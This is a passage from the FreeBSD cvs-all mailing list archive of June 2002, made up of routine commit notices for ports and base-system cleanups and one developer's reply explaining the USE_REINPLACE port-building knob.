AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAqy45E23KA808OnZ574zMUDFlOKe+byhLw9UzlPYVv9PLFwSzSx5G8YarsQGrsxbPt+Jp67hR k5d+6Oj3qKog8btz+Z3KV2r2mnmlar+YPQpqyDzNpXks2EtlXiHRrZEK0sQWuw9e44eaNCg/xl41 galwCSk6W382zEBmrlp71FaYaBONoyBxLJs3zVPmmZiW9jEq7NiSkpWiO2KwgokTX6h8hs6lwBpt zKUdEcS5KLjqzn2/g+l9GKDa09d0o8ZelqMN49rWTrt5TlIxpdb5F1vw9MPKcA6bf0XrEabCo8ky cNaEr/boijWokwGC2Y819gV3drh8AiRZQbECTCHl5l0UHQUfEeJLQBjyUr44qTip92DcPHO3liyh L4czHBoC4XPYMpcwzWRla0FGdlOdZ3mxPE+XENezHIERN7la+DcHI+gSTptuLz5wMKNhEcgDeYBJ 5aZSRnFVDvPt09CrxreFD3sM69PdiI5HpLVBGzLTyqbuHD9Yn0YPUBkocOH3XKq6ewbjluo409W/ PzOyPM1sRF4MSNHjS+RyhaeUUtYbelKnTYWBgk0vIiOVOh0NxPnweREShR/p5ISiRb1WiH1IFihe 6LrgsCc/bqT3R+gu81sPq0EABsvpdx9MqFsj9XcXhDKVzjSv6gmOGlxtz6JT+WqX98Ajgp4XZZ0/ V6kk20e1uACcqIWiPiIrTCHWzfI3YnR641AHTB4KvreBMa0qT0MTNlhzdOSEFrMtUOhMaB4HXynO DRsZAmzVb3ecervVEicgc5gCQzfUGX4iChTEtizxujvnw8w5G5UMLAtExlaYhxYFLarPrU9v6lMk Firo2HEPNIYn7stFZ1zfLisJDK1InBI8C2kF7jdlrzA1P4jP2FUdWlzH8I4KVyUnMxYkuxVvVt3v tDd4qyS0BaRU4g2ev7wHojRtFBdgA6ZzHJmcG3yp5hb0BkyeWdKJoZWeObr1OM5l3xY/ouTNi0oh I55N5GB2WTcuQW7VMmpp48U74LngVx41ZzlH --secxrvx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3: 4:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 02E7637B40C; Fri, 21 Jun 2002 03:04:04 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LA44N33491; Fri, 21 Jun 2002 03:04:04 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206211004.g5LA44N33491@freefall.freebsd.org> From: Joseph Koshy Date: Fri, 21 Jun 2002 03:04:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc Makefile ports/textproc/p5-Text-EtText Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/21 03:04:04 PDT Modified files: textproc Makefile Added files: textproc/p5-Text-EtText Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Text::EtText, a simple plain-text markup to HTML convertor. Revision Changes Path 1.377 +1 -0 ports/textproc/Makefile 1.1 +25 -0 ports/textproc/p5-Text-EtText/Makefile (new) 1.1 +1 -0 ports/textproc/p5-Text-EtText/distinfo (new) 1.1 +1 -0 ports/textproc/p5-Text-EtText/pkg-comment (new) 1.1 +8 -0 ports/textproc/p5-Text-EtText/pkg-descr (new) 1.1 +13 -0 ports/textproc/p5-Text-EtText/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3: 4:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 06E7D37B406; Fri, 21 Jun 2002 03:04:07 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LA46E33528; Fri, 21 Jun 2002 03:04:07 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206211004.g5LA46E33528@freefall.freebsd.org> From: Joseph Koshy Date: Fri, 21 Jun 2002 03:04:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/21 03:04:06 PDT Modified files: . modules Log: p5-Text-EtText --> ports/textproc/p5-Text-EtText Revision Changes Path 1.5394 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3:15: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4783637B40A; Fri, 21 Jun 2002 03:14:58 -0700 (PDT) Received: (from markm@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LAEwS38601; Fri, 21 Jun 2002 03:14:58 -0700 (PDT) (envelope-from markm) Message-Id: <200206211014.g5LAEwS38601@freefall.freebsd.org> From: Mark Murray Date: Fri, 21 Jun 2002 03:14:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/pr egetopt.c pr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG markm 2002/06/21 03:14:57 PDT Modified files: usr.bin/pr egetopt.c pr.c Log: Modernise this code by rounding up the usual suspects: register keyword, consts, ANSIfication of functions, proper use of __FBSDID() and so on. This commit is non-functional from a code-execution perspective, but pr(1) now compiles WARNS=6 clean. Revision Changes Path 1.2 +16 -13 src/usr.bin/pr/egetopt.c 1.15 +71 -107 src/usr.bin/pr/pr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3:21:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D57B137B406; Fri, 21 Jun 2002 03:21:21 -0700 (PDT) Received: (from markm@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LALLn39221; Fri, 21 Jun 2002 03:21:21 -0700 (PDT) (envelope-from markm) Message-Id: <200206211021.g5LALLn39221@freefall.freebsd.org> From: Mark Murray Date: Fri, 21 Jun 2002 03:21:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/kdump Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG markm 2002/06/21 03:21:21 PDT Modified files: usr.bin/kdump Makefile Log: Style tidy-up. Revision Changes Path 1.9 +4 -2 src/usr.bin/kdump/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3:22:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 89E5437B404; Fri, 21 Jun 2002 03:22:39 -0700 (PDT) Received: (from markm@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LAMdF39460; Fri, 21 Jun 2002 03:22:39 -0700 (PDT) (envelope-from markm) Message-Id: <200206211022.g5LAMdF39460@freefall.freebsd.org> From: Mark Murray Date: Fri, 21 Jun 2002 03:22:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/kdump mkioctls X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG markm 2002/06/21 03:22:39 PDT Modified files: usr.bin/kdump mkioctls Log: Fix warnings generated elsewhere. Revision Changes Path 1.30 +1 -1 src/usr.bin/kdump/mkioctls To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3:28:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 658D337B40C; Fri, 21 Jun 2002 03:28:35 -0700 (PDT) Received: (from tg@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LASZG39829; Fri, 21 Jun 2002 03:28:35 -0700 (PDT) (envelope-from tg) Message-Id: <200206211028.g5LASZG39829@freefall.freebsd.org> From: Thomas Gellekum Date: Fri, 21 Jun 2002 03:28:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/py-wxPython Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tg 2002/06/21 03:28:35 PDT Modified files: x11-toolkits/py-wxPython Makefile Log: Catch up with latest developments in bsd.python.mk. Approved by: sobomax Revision Changes Path 1.25 +4 -10 ports/x11-toolkits/py-wxPython/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3:57:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 46AC637B404; Fri, 21 Jun 2002 03:56:45 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LAujv42603; Fri, 21 Jun 2002 03:56:45 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211056.g5LAujv42603@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 03:56:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/config lang.l X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 03:56:44 PDT Modified files: usr.sbin/config lang.l Log: Clean up hex() and octal() to return and work with unsigned integers since they scan values of unsigned types, and since they do not need otherwise, have them take const char * arguments. Revision Changes Path 1.33 +9 -9 src/usr.sbin/config/lang.l To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4: 0: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2579737B40D; Fri, 21 Jun 2002 04:00:01 -0700 (PDT) Received: (from phk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LB01542851; Fri, 21 Jun 2002 04:00:01 -0700 (PDT) (envelope-from phk) Message-Id: <200206211100.g5LB01542851@freefall.freebsd.org> From: Poul-Henning Kamp Date: Fri, 21 Jun 2002 04:00:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/boot/i386 Makefile src/sys/boot/i386/boot2 Makefile src/sys/boot/i386/libi386 Makefile src/sys/boot/i386/loader Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG phk 2002/06/21 04:00:00 PDT Modified files: sys/boot/i386 Makefile sys/boot/i386/boot2 Makefile sys/boot/i386/libi386 Makefile sys/boot/i386/loader Makefile Log: Revert the part of Kirks UFS2 commit which added divdi3.c and moddi3.c to libi386, this issue was resolved already in a cleaner way. Revision Changes Path 1.18 +1 -1 src/sys/boot/i386/Makefile 1.31 +1 -1 src/sys/boot/i386/boot2/Makefile 1.27 +4 -7 src/sys/boot/i386/libi386/Makefile 1.59 +1 -1 src/sys/boot/i386/loader/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4: 6:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3633037B400; Fri, 21 Jun 2002 04:06:12 -0700 (PDT) Received: (from markm@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LB6C651326; Fri, 21 Jun 2002 04:06:12 -0700 (PDT) (envelope-from markm) Message-Id: <200206211106.g5LB6C651326@freefall.freebsd.org> From: Mark Murray Date: Fri, 21 Jun 2002 04:06:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/kdump Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG markm 2002/06/21 04:06:12 PDT Modified files: usr.bin/kdump Makefile Log: Better fix for style. Suggested by: ru (but modified a bit by markm) Revision Changes Path 1.10 +6 -6 src/usr.bin/kdump/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:18:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A509F37B40E; Fri, 21 Jun 2002 04:18:42 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBIgr52343; Fri, 21 Jun 2002 04:18:42 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211118.g5LBIgr52343@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:18:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd builtins.c inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:18:42 PDT Modified files: usr.sbin/inetd builtins.c inetd.c Log: ANSI prototypes via protoize(1). Revision Changes Path 1.38 +36 -44 src/usr.sbin/inetd/builtins.c 1.98 +28 -56 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:24:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 193B137B41F; Fri, 21 Jun 2002 04:24:22 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBOMF53029; Fri, 21 Jun 2002 04:24:22 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211124.g5LBOMF53029@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:24:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd builtins.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:24:21 PDT Modified files: usr.sbin/inetd builtins.c Log: Kill bad whitespace and do some style cleanups as a result of the protoize. Revision Changes Path 1.39 +20 -30 src/usr.sbin/inetd/builtins.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:25:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EBD2A37B40F; Fri, 21 Jun 2002 04:25:11 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBPBH53132; Fri, 21 Jun 2002 04:25:11 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211125.g5LBPBH53132@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:25:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:25:11 PDT Modified files: usr.sbin/inetd inetd.c Log: Use __typeof__ instead of typeof. Revision Changes Path 1.99 +1 -1 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:41:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C43237B4BC; Fri, 21 Jun 2002 04:40:04 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBe4p54476; Fri, 21 Jun 2002 04:40:04 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211140.g5LBe4p54476@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:40:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd builtins.c inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:40:04 PDT Modified files: usr.sbin/inetd builtins.c inetd.c Log: Mark unused variables __unused. Built standalone, inetd(8) is WARNS=5 clean, WARNS=6 if you ignore %m fits. Revision Changes Path 1.40 +2 -2 src/usr.sbin/inetd/builtins.c 1.100 +3 -3 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:46: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E86E337B633; Fri, 21 Jun 2002 04:42:43 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBgb955088; Fri, 21 Jun 2002 04:42:37 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211142.g5LBgb955088@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:42:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd builtins.c inetd.c inetd.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:42:37 PDT Modified files: usr.sbin/inetd builtins.c inetd.c inetd.h Log: Kill __P, yuck. Revision Changes Path 1.41 +15 -15 src/usr.sbin/inetd/builtins.c 1.101 +22 -22 src/usr.sbin/inetd/inetd.c 1.12 +10 -10 src/usr.sbin/inetd/inetd.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 4:53: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3AD7537B403; Fri, 21 Jun 2002 04:52:59 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LBqxI56047; Fri, 21 Jun 2002 04:52:59 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206211152.g5LBqxI56047@freefall.freebsd.org> From: Juli Mallett Date: Fri, 21 Jun 2002 04:52:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd builtins.c inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/21 04:52:59 PDT Modified files: usr.sbin/inetd builtins.c inetd.c Log: __FBSDID() strategic insertion. Revision Changes Path 1.42 +3 -3 src/usr.sbin/inetd/builtins.c 1.102 +3 -2 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5: 6:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB71937B401; Fri, 21 Jun 2002 05:06:05 -0700 (PDT) Received: (from sumikawa@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LC65O61369; Fri, 21 Jun 2002 05:06:05 -0700 (PDT) (envelope-from sumikawa) Message-Id: <200206211206.g5LC65O61369@freefall.freebsd.org> From: Munechika SUMIKAWA Date: Fri, 21 Jun 2002 05:06:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13+ipv6 Makefile distinfo pkg-deinstall pkg-install pkg-message pkg-plist ports/www/apache13+ipv6/files FreeBSD.layout apache.sh patch-aa patch-ab patch-ag patch-ak patch-al X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sumikawa 2002/06/21 05:06:05 PDT Modified files: www/apache13+ipv6 Makefile distinfo pkg-deinstall pkg-install pkg-plist www/apache13+ipv6/files apache.sh patch-aa patch-ab patch-ag patch-ak patch-al Added files: www/apache13+ipv6 pkg-message Removed files: www/apache13+ipv6/files FreeBSD.layout Log: Upgrade to 1.3.26. Revision Changes Path 1.29 +64 -18 ports/www/apache13+ipv6/Makefile 1.15 +2 -2 ports/www/apache13+ipv6/distinfo 1.4 +0 -20 ports/www/apache13+ipv6/files/FreeBSD.layout (dead) 1.3 +2 -7 ports/www/apache13+ipv6/files/apache.sh 1.2 +4 -8 ports/www/apache13+ipv6/files/patch-aa 1.6 +5 -12 ports/www/apache13+ipv6/files/patch-ab 1.3 +16 -22 ports/www/apache13+ipv6/files/patch-ag 1.2 +1 -1 ports/www/apache13+ipv6/files/patch-ak 1.2 +4 -4 ports/www/apache13+ipv6/files/patch-al 1.3 +1 -1 ports/www/apache13+ipv6/pkg-deinstall 1.2 +0 -0 ports/www/apache13+ipv6/pkg-install 1.1 +4 -0 ports/www/apache13+ipv6/pkg-message (new) 1.14 +71 -24 ports/www/apache13+ipv6/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:22:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6305237B40C; Fri, 21 Jun 2002 05:22:09 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LCM9V63110; Fri, 21 Jun 2002 05:22:09 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211222.g5LCM9V63110@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 05:22:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/deskutils/gnucash Makefile ports/deskutils/gnucash/files patch-lib::srfi::srfi-8.scm X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 05:22:08 PDT Modified files: deskutils/gnucash Makefile Added files: deskutils/gnucash/files patch-lib::srfi::srfi-8.scm Log: - Fix incompatibility with guile-1.4.1 and bump PORTREVISION; - use USE_REINPLACE while I am here. Reported by: Glenn Johnson Revision Changes Path 1.42 +7 -5 ports/deskutils/gnucash/Makefile 1.1 +15 -0 ports/deskutils/gnucash/files/patch-lib::srfi::srfi-8.scm (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:27:36 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id A449C37B410; Fri, 21 Jun 2002 05:27:30 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ64T8; Fri, 21 Jun 2002 15:29:35 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5LCRNb42808; Fri, 21 Jun 2002 15:27:23 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D131BEA.3CFD730D@FreeBSD.org> Date: Fri, 21 Jun 2002 15:28:26 +0300 From: Maxim Sobolev Reply-To: vegacap@i.com.ua Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: Brian Somers Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/Mk bsd.port.mk References: <200206190821.g5J8LRM38683@freefall.freebsd.org> <20020621011806.29559271.brian@Awfulhak.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Brian Somers wrote: > > This seemed to fail with RINPLACE_CMD being undefined when USE_REINPLACE > is undefined and gets stuck in an infinite loop (sed_inplace seemed to > depend on itself) when USE_REINPLACE is defined but sed_inplace isn't > installed. > > Installing sed_inplace manually and then doing make -DUSE_REINPLACE worked. That's because you are adding -DUSE_REINPLACE into comman line (or setting it via environment or /etc/make.conf) - it isn't intended to be used like that. Try to build x11/XFree86-4-libraries with -DUSE_XLIB - you will get the same effect. USE_REINPLACE should be *only* defined in ports' Makefiles, it isn't something that the user might need/want to set manually. -Maxim > > On Wed, 19 Jun 2002 01:21:27 -0700 (PDT), Maxim Sobolev wrote: > > sobomax 2002/06/19 01:21:27 PDT > > > > Modified files: > > Mk bsd.port.mk > > Log: > > Change the way REINPLACE_CMD works - instead of using perl(1) on systems > > where sed(1) can't do in-place editing add a new USE_REINPLACE knob, which > > if turned on defines REINPLACE_CMD and adds textproc/sed_inplace port into > > BUILD_DEPENDS if necessary. > > > > Not objected by: portmgr@ > > > > Revision Changes Path > > 1.415 +11 -7 ports/Mk/bsd.port.mk > > -- > Brian > > Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:29:33 2002 Delivered-To: cvs-all@freebsd.org Received: from 